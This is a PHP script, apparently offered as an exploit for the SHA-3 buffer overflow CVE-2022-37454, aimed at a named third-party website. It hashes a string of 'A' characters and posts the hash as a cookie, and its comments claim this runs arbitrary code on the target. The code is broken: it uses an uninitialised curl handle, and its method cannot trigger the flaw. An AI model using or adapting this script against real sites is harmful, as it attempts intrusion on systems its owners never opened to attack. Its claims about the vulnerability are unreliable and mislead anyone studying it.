<?php
// CVE-2022-37454 exploit code
// Based on https://www.rapid7.com/db/vulnerabilities/php-cve-2022-37454/
// Target URL
$url = "https://fastfounder.ru/na-kazhdom-zarabotat/";
// Payload to execute arbitrary code or eliminate expected cryptographic properties
$payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
// Create a hash object using SHA-3 algorithm
$hash = hash_init("sha3-512");
// Update the hash with the payload
hash_update($hash, $payload);
// Get the hash value
$hash_value = hash_final($hash);
// Send the hash value as a cookie or a parameter to the target URL
// This will trigger the buffer overflow and execute the payload or break the cryptography
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIE, "hash=$hash_value"); // or use CURLOPT_POSTFIELDS for parameters
$output = curl_exec($ch);
curl_close($ch);
// Print the output
echo $output;
?>